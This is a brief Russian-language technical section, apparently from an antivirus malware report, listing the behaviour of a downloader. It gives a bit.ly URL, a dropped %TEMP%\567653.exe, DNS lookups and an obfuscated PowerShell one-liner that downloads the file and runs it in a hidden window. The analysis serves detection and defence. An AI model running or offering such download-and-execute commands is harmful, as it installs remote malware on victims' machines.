Техническая информация
- http://bit.ly/2rxqvhf как %temp%\567653.exe
- %TEMP%\567653.exe
- 'bi#.ly':80
- http://bi#.ly/2rXqvhF
- DNS ASK bi#.ly
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2rXqvhF ” , ”$ENv:teMp\567653.exe” ) ; stARt ”$ENv:tEMP\567653.exe”' (со скрытым окном)